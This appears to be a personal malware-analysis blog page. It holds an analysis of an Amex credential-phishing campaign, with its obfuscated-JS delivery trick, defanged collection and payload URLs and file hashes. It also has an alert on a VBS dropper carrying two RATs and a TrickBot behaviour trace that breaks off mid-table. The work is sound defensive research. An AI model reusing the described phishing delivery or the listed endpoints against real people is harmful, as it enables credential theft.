<h2>RakshaTec... personal InfoSec blog by Vishal Thakur.</h2>
<h2>Some more reports on my AZORult analysis (2018-10-11)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
https://cyware.com/news/new-azorult-variant-being-used-by-hacker-oktropys-to-spread-aurora-ransomware-6e5c7a5b<br />
<br />
https://threatravens.com/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/<br />
<br />
https://www.tecnoup.com.mx/como-se-introduce-un-malware-en-un-pdf/<br />
<br />
<br /></div>
<h2>An in-depth malware analysis of QuantLoader by Vishal Thakur (2018-10-11)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
https://hk.saowen.com/a/c873d629bc59d277a3b02dc022a0a35bf66553b00b16fa55b8c9d26fd88daa3e</div>
<h2>AZORult campaign analysis by Vishal Thakur (2018-10-11)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
https://www.silobreaker.com/silobreaker-daily-cyber-digest-20-august-2018/</div>
<h2>AZORult Trojan Serving Aurora Ransomware by MalActor Oktropys (2018-10-11)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/</div>
<h2>MAJOR CHANGES IN EMOTET MALWARE (2018-10-11)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
Some of my work got picked up by third parties and was reported on.<br />
https://socprime.com/news/major-changes-in-emotet-malware/<br />
<br />
<br /></div>
<h2>Malware analysis: decoding Emotet, part 1 (2018-05-31)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
The first part of my analysis of the Emotet banking malware is now available on the <a href="https://blog.malwarebytes.com/threat-analysis/2018/05/malware-analysis-decoding-emotet-part-1/" target="_blank">Malwarebytes Blog</a>.<br />
<br />
https://blog.malwarebytes.com/threat-analysis/2018/05/malware-analysis-decoding-emotet-part-1/</div>
<h2>Shodan IOC ingestion into ThreatConnect (2018-05-15)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
Added scripts to ingest IOCs downloaded from Shodan into ThreatConnect.<br />
<br />
https://github.com/vithakur/shodan-tools</div>
<h2>Amex Phishing Campaign, JS encoded in htm file | April 2018 (2018-04-28)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Let's take a look at this new credential-stealing phishing campaign, which is currently targeting users globally. The campaign has been carefully crafted and the JS delivery method is clever (although it has been seen widely before). </div>
<div class="separator" style="clear: both; text-align: left;">
The entire page is rendered by a single document.write call in the JS file that the initial HTML loads. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The malicious JS is not detected as malicious by any AV engine at the time of this post (SHA-256: 21e9e71186e3bc725c4bf88da1192eff25335a408a5aede56787a3295df501d3). </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Pretty neat - let's take a look. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here's the phish that comes in: </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglFgREwLGOVXbMSEehB2unP5oRalAH1AQKJWlTrWiAP0hAdythdQ06sY_bGMAUgNmQzTO7nzqGa1BkwNOBYU19C2_XXtaO8C9IfoQQEDH5U573eu7tcMtUHWDlH63Eta0OXpVmL4epCVXm/s1600/Screen+Shot+2018-04-28+at+1.34.06+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1009" data-original-width="1414" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglFgREwLGOVXbMSEehB2unP5oRalAH1AQKJWlTrWiAP0hAdythdQ06sY_bGMAUgNmQzTO7nzqGa1BkwNOBYU19C2_XXtaO8C9IfoQQEDH5U573eu7tcMtUHWDlH63Eta0OXpVmL4epCVXm/s640/Screen+Shot+2018-04-28+at+1.34.06+am.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here is the .htm attachment, which the user is directed to save to disk and then open locally, so this first stage needs no network call-out at all:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkyBi_XUZCVAu5tNSb7wxf9HyvH31lQXoS6tY3GG2w2LAg1ISEzmdSXtF0QVZjh0Om-LoAxRleHhVrDwSbnTUkOM6FNRy6emhfyCEIof614FyKQ6lfkg93HorTLsfYsC1Oyir-eoiIB4Aa/s1600/Screen+Shot+2018-04-28+at+1.34.14+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="366" data-original-width="384" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkyBi_XUZCVAu5tNSb7wxf9HyvH31lQXoS6tY3GG2w2LAg1ISEzmdSXtF0QVZjh0Om-LoAxRleHhVrDwSbnTUkOM6FNRy6emhfyCEIof614FyKQ6lfkg93HorTLsfYsC1Oyir-eoiIB4Aa/s320/Screen+Shot+2018-04-28+at+1.34.14+am.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Let's take a look at the html code:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9xDONN3SnnN7LjvpxUkAoS_T-nYX5u86RFXLW_YAxUbgJEDJTUsUkIkif5pxxOrFcRBC6dS6HPwbbxN4cxE3Kt5NRVXLvFlwx5KokzFNsMAIYD3KGxp7ArBIC1GxGREN5K7shjYzpnwx8/s1600/Screen+Shot+2018-04-28+at+1.34.25+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="538" data-original-width="1600" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9xDONN3SnnN7LjvpxUkAoS_T-nYX5u86RFXLW_YAxUbgJEDJTUsUkIkif5pxxOrFcRBC6dS6HPwbbxN4cxE3Kt5NRVXLvFlwx5KokzFNsMAIYD3KGxp7ArBIC1GxGREN5K7shjYzpnwx8/s640/Screen+Shot+2018-04-28+at+1.34.25+am.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As you can see above, the HTML does nothing but load an externally hosted JS file. When that script runs, it writes out the entire fake page, whose form submits the user's input to the C2. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Let's take a quick look at the code from swf.js. It is important not to get overwhelmed by the code here: it may look like a lot, but it is quite easy to decode. All we need to do is change one function in the code and it'll sing to our tune!</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2xq1PW1UTloGn9bbdulGB63Bvv_ga-iTPD7A4xMKxeXlXfgRSwdUzLIW3UwdMMuj99RDWqFRs2ZVNtx7CEmQin-TGZbNPd49U9op-hLm4UgyBP9jp0TTPcutIltOIPz22UR1TeIhtTbH3/s1600/Screen+Shot+2018-04-28+at+1.38.09+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="991" data-original-width="1600" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2xq1PW1UTloGn9bbdulGB63Bvv_ga-iTPD7A4xMKxeXlXfgRSwdUzLIW3UwdMMuj99RDWqFRs2ZVNtx7CEmQin-TGZbNPd49U9op-hLm4UgyBP9jp0TTPcutIltOIPz22UR1TeIhtTbH3/s640/Screen+Shot+2018-04-28+at+1.38.09+am.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But first, let's take a look at the HTML file that is downloaded from the phishing email. As always, they try to steal as much PII as possible (even the email account and its password). When opened in a browser, this is what it looks like:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwDMHPy4n_kZRQElvYxY7zRPr3vJJ-yxDqRm_BeB_4NRl8FXchBR3fGsa4dOHKqmrbhyphenhyphenSZ3dUHQjnCeU8CzivSdQjkL2Ih1ATzXHdcOHoYRG-GMQ5Ay6IczXZp0xGuhgLpZEEbkc0Rr-O-/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1283" data-original-width="1600" height="512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwDMHPy4n_kZRQElvYxY7zRPr3vJJ-yxDqRm_BeB_4NRl8FXchBR3fGsa4dOHKqmrbhyphenhyphenSZ3dUHQjnCeU8CzivSdQjkL2Ih1ATzXHdcOHoYRG-GMQ5Ay6IczXZp0xGuhgLpZEEbkc0Rr-O-/s640/Capture.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2WD1bPcPsEmNvkNQLnh7AOQtO8qSUOZUS_zwdQlxElS_UboqjmwwJIobGBqtr2Gg_p4rHn8mT9iRsX22QMeqceOG5flDLlbKrYkBe2h7Vq_nz1cJBq9Uz1q_cu9kb76MeFz7L7CE7db2J/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1239" data-original-width="1439" height="550" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2WD1bPcPsEmNvkNQLnh7AOQtO8qSUOZUS_zwdQlxElS_UboqjmwwJIobGBqtr2Gg_p4rHn8mT9iRsX22QMeqceOG5flDLlbKrYkBe2h7Vq_nz1cJBq9Uz1q_cu9kb76MeFz7L7CE7db2J/s640/2.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJj0MHKa6z0tMfZBvZDewJtpgqr3qUCVfrM28g6S8Z0M3L01l6muO2s9wF9ht-vUMFE-d3DuTgvetr0Ccx0MK391HmTmW29QtydoGFyUIetInovT7BL52vaQhK5iX25ONvBM9v5iVvWtJj/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="785" data-original-width="1133" height="442" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJj0MHKa6z0tMfZBvZDewJtpgqr3qUCVfrM28g6S8Z0M3L01l6muO2s9wF9ht-vUMFE-d3DuTgvetr0Ccx0MK391HmTmW29QtydoGFyUIetInovT7BL52vaQhK5iX25ONvBM9v5iVvWtJj/s640/3.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
When we inspect the form code, we can clearly see that the POST request goes to the collection endpoint hosted at "manoda.se"; this is where all the stolen information is sent. </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyU1Pqw9ASvg2dY6WUmGxoMJFy5Fvo9paCmJJiPXTFw1iyhxd9HoCVXW1F83dI_G8sIp3rr1n6Qj-bZffRlGtg7laT5H-Yd2BjBcuWufNOYYyGQjQO1sr2P_s3nj3BnWLE2lCkUPr0cyKS/s1600/Screen+Shot+2018-04-28+at+1.46.13+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="72" data-original-width="936" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyU1Pqw9ASvg2dY6WUmGxoMJFy5Fvo9paCmJJiPXTFw1iyhxd9HoCVXW1F83dI_G8sIp3rr1n6Qj-bZffRlGtg7laT5H-Yd2BjBcuWufNOYYyGQjQO1sr2P_s3nj3BnWLE2lCkUPr0cyKS/s640/Screen+Shot+2018-04-28+at+1.46.13+am.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
And now, let's take a look at the function in the JS code that loads the entire fake page onto the browser. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTGswRocatMdAfVwCl4RJiTas6i2qhy-AxNCd2ZULD6a7-SqRVuNXBbBvxnaIvlTA2T_zLuPeKOyGy_AOwaLI8_QfO7eggLK09_vi54BK4PVa4UM8BBvSOAAuELOKnVA-_sPUg5uuDhjf/s1600/Screen+Shot+2018-04-29+at+1.12.17+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="138" data-original-width="1348" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTGswRocatMdAfVwCl4RJiTas6i2qhy-AxNCd2ZULD6a7-SqRVuNXBbBvxnaIvlTA2T_zLuPeKOyGy_AOwaLI8_QfO7eggLK09_vi54BK4PVa4UM8BBvSOAAuELOKnVA-_sPUg5uuDhjf/s640/Screen+Shot+2018-04-29+at+1.12.17+am.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Once the loop has finished, var x holds the decoded page, ready to be executed. In this case the script passes it to 'document.write', which renders it as HTML in the browser. Because the decoding happens in the script itself, we can reuse that code to make the script decode and display its own obfuscated payload.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The simple trick is to change 'document.write' to 'WScript.Echo' (JScript resolves the COM method name case-insensitively, so 'WScript.echo' works too); that's it. Run the script under wscript.exe and it will display the entire decoded HTML in a pop-up window. Run it under cscript.exe instead and the output goes to the console, where it can be redirected into a text file. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFzgECjmcHx68IIEc5EQKPyILs11IrTG-Mcp2OjoeSRy49qx_JSxAnZXr00SSe5Vs70tsDJqQTbltmBXc_uERZlEfKVSUsxPrUSE-RFIjgKXAL_4rK6DPgMK_GddYNz3TTcIPpuF9rmCRN/s1600/Screen+Shot+2018-04-28+at+1.57.06+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1568" data-original-width="1600" height="626" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFzgECjmcHx68IIEc5EQKPyILs11IrTG-Mcp2OjoeSRy49qx_JSxAnZXr00SSe5Vs70tsDJqQTbltmBXc_uERZlEfKVSUsxPrUSE-RFIjgKXAL_4rK6DPgMK_GddYNz3TTcIPpuF9rmCRN/s640/Screen+Shot+2018-04-28+at+1.57.06+am.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The delivery method has been around for a while now. Having the victim open the attachment locally means at least one stage never has to traverse the proxy/firewall. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<i>Here are some usable/actionable details:</i></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
FileName: swf.js</div>
<div class="separator" style="clear: both; text-align: left;">
SHA-256: 21e9e71186e3bc725c4bf88da1192eff25335a408a5aede56787a3295df501d3</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://www.virustotal.com/#/file/21e9e71186e3bc725c4bf88da1192eff25335a408a5aede56787a3295df501d3/detection" target="_blank">VirusTotal link</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
https://justforgame[.]it/vserv/swf.js</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
http://www.manoda[.]se/socket/license/lib/etc/spoof.php</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br /></div>
<h2>Malware Alert: Schneiken Double Dropper (2018-04-10, updated 2018-04-16)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
<b>** UPDATE **</b><br />
<i>I have now published a full analysis of this malware. As of now (17 APR 2018), there is still no AV detecting it successfully, and there is no name for it, so I'm going with 'Schneiken'. </i><br />
<br />
There is new malware actively being served through phishing campaigns at the time of this post.<br />
<br />
This is the Schneiken dropper, an interesting piece of malware written in VBS that comes with multiple layers of code obfuscation. It drops TWO RATs onto the victim's disk: the Duhini RAT and the RATTY JRAT. Both RATs are embedded in the VBS dropper.<br />
<br />
I'll be posting a detailed analysis of this malware soon and will update this post with the link to that.<br />
<br />
Here are the details in the meantime:<br />
<br />
Flow:<br />
Phish > HREF > PDF > HREF > ZIP > VBS > JRAT + Duhini RAT<br />
<br />
MD5: 47f21544a7479cae3e20488731ba6aa6<br />
SHA256: d5f56058608f8dabb9d19c432c751f99f994edd056b2846ac51915258494598a<br />
Filename: TT COPY.vbs <br />
<br />
JRAT that is being dropped by this malware:<br />
<br />
RATTY.jar<br />
MD5: 9b93c76d2dacf7adaacfc1e99dae8089<br />
<br />
Deobfuscated/Decoded files: https://github.com/vithakur/schneiken<br />
</div>
<h2>An in-depth malware analysis of QuantLoader (2018-04-04)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
I published this article on QuantLoader; if you're interested, have a <a href="https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/" target="_blank">read here</a>:<br />
<br />
https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/</div>
<h2>Olly Tutorial (2018-02-28)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
https://drive.google.com/file/d/1g_SOOq1g24KzmmKfb39RruMA9AxAQSsc/view?usp=sharing</div>
<h2>Python - useful links (2018-01-10)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
http://timgolden.me.uk/python/wmi/cookbook.html<br />
<h2 style="text-align: left;">
wmi Cookbook</h2>
These examples assume you are using the WMI module from this site. The following are examples of useful things that could be done with this module on win32 machines. It hardly scratches the surface of WMI, but that’s probably as well.<br /><br />The following examples, except where stated otherwise, all assume that you are connecting to the current machine. To connect to a remote machine, simply specify the remote machine name in the WMI constructor, and by the wonders of DCOM, all should be well:<br /><br /></div>
<h2>Malware - TrickBot Analysis December 2017 (2017-12-18)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: left;">
What's new:</h2>
<div style="text-align: left;">
New execution flow: the on-disk directory structure has changed.</div>
<div style="text-align: left;">
Instead of the winapp folder, look for these paths:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
C:\Users\me\AppData\Roaming\services\</div>
<div style="text-align: left;">
C:\Users\me\AppData\Roaming\services\Modules</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
And of course, new icon :)</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlWeSRGJgvPWu4B5As250RhKbqtlubX4PwshUx_GDKCelq0jqYHnzMJQdbyovbmsCy8wDlRZgpV6vhcfMqbtXFWV2AagKNnzwkOBgM1QpidYNSXkiIA83YTmrP7VRCFON8mBqOJfVedLkl/s1600/trk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="90" data-original-width="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlWeSRGJgvPWu4B5As250RhKbqtlubX4PwshUx_GDKCelq0jqYHnzMJQdbyovbmsCy8wDlRZgpV6vhcfMqbtXFWV2AagKNnzwkOBgM1QpidYNSXkiIA83YTmrP7VRCFON8mBqOJfVedLkl/s1600/trk.png" /></a></div>
<div style="text-align: left;">
<br /></div>
<h2 style="text-align: left;">
Identifiers:</h2>
<br />
Microsoft Visual Basic v5.0/v6.0<br />
<br />
Imports:<br />
MSVBVM60.DLL - 70 functions<br />
<br />
1 VERSIONINFO<br />
FILEVERSION 5,0,0,0<br />
PRODUCTVERSION 5,0,0,0<br />
FILEOS 0x4<br />
FILETYPE 0x1<br />
{<br />
BLOCK "StringFileInfo"<br />
{<br />
BLOCK "040904B0"<br />
{<br />
VALUE "CompanyName", "Thadickatt House"<br />
VALUE "FileDescription", "Pil, ecco quanto produce il Sistema Umbria"<br />
VALUE "LegalCopyright", "Copyright © 2017 - DUESSE COMMUNICATION S.r.l"<br />
VALUE "LegalTrademarks", "Edah, should not be confused with the Haredi communal body in Israel known as the Edah"<br />
VALUE "ProductName", "Thadickat"<br />
VALUE "FileVersion", "5.00"<br />
VALUE "ProductVersion", "5.00"<br />
VALUE "InternalName", "Thadickat"<br />
VALUE "OriginalFilename", "Thadickat.exe"<br />
}<br />
}<br />
<br />
BLOCK "VarFileInfo"<br />
{<br />
VALUE "Translation", 0x0409 0x04B0 <br />
}<br />
}<br />
<br />
<br />
<h2 style="text-align: left;">
FLOW:</h2>
<table border="1" cellpadding="0" cellspacing="0" dir="ltr" style="border-collapse: collapse; border: none; font-family: arial,sans,sans-serif; font-size: 10pt; table-layout: fixed; width: 0px;"><colgroup><col width="171"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col></colgroup><tbody>
<tr><td>Load Image</td><td>C:\Windows\SysWOW64\kernel32.dll</td></tr>
<tr><td>Load Image</td><td>C:\Windows\SysWOW64\KernelBase.dll</td></tr>
<tr><td>RegOpenKey</td><td>HKLM\System\CurrentControlSet\Control\Terminal Server</td></tr>
<tr><td>RegOpenKey</td><td>HKLM\Software\Wow6432Node\Policies\Microsoft\Windows\Safer\CodeIdentifiers</td></tr>
<tr><td>Load Image</td><td>C:\Windows\SysWOW64\apphelp.dll</td></tr>
<tr><td>RegOpenKey</td><td>HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Disable8And16BitMitigation</td></tr>
<tr><td>CreateFile</td><td>C:\Windows\SysWOW64\rpcss.dll</td></tr>
<tr><td>RegOpenKey</td><td>HKLM\SYSTEM\CurrentControlSet\Control\Session Manager</td></tr>
<tr><td>RegCloseKey</td><td>HKLM\Software\Wow6432Node\Microsoft\Cryptography\Offload</td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Local\\Temp\\~DF77D59600395B2DB0.TMP"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 499px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Local\Temp\~DF77D59600395B2DB0.TMP</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"RegOpenKey"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">RegOpenKey</td><td data-sheets-value="{"1":2,"2":"HKLM\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 600px;">
<div style="float: left;">
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"RegOpenKey"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">RegOpenKey</td><td data-sheets-value="{"1":2,"2":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\2\\KnownFolders"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 600px;">
<div style="float: left;">
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\KnownFolders</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 297px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming\\services"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 297px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming\services</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming\\services\\Uiaejdlat.exe"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 398px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe</div>
</div>
